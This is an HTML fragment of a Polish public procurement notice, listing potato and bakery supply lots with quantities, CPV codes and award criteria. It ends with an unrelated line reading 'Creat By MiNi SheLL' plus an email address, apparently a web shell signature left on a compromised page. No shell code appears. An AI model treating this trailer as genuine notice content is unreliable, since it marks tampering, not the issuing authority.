</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Ziemniaki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ziemniaki jadalne - odmiana IRGA - opakowanie min.  25 kg, max. 30 kg	kg	11771,00

 (wielkość zamówienia i asortyment może ulec zmianie w zakresie do 30 %).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.31.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Czas realizacji zamówienia uzupełniającego złożonego w dniu dostawy (od 1 godziny do 6 godzin) - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Pieczywo.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Bułka tarta	kg	133,23
Bułeczka drożdżowa z dżemem 60 g szt.	2200,00
Bułki pszenne-z ziarnem słonecznika 0,07 kg	szt.	1000,00
Bułki wrocławskie, pszenne  50 g. kg	szt.	10466,50
Chleb  pszenny - krojony 0,5 kg	kg	224,00
Chleb  mieszany - krojony 0,5 kg	kg	35,00
Chleb  razowy - krojony 0,5 kg	kg	100,00
CHAŁKA - pieczywo pszenne z ciasta maślanego posypane na wierzchu kruszonką - warkocz spleciony z kawałków ciasta drożdżowego- waga 0,35 kg	kg	86,00
Pączek z lukrem i dżemem 70 g.	szt.	1000,00
Rogal lub paluch maślany 80 g.	szt.	2100,00
Wafle  zbożowe - opakowanie 
(100 g ) opak.	1100,00

 (wielkość zamówienia i asortyment może ulec zmianie w zakresie do 30 %).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.81.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Czas realizacji zamówienia uzupełniającego złożonego w dniu dostawy (od 1 godziny do 6 godzin) - 10</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com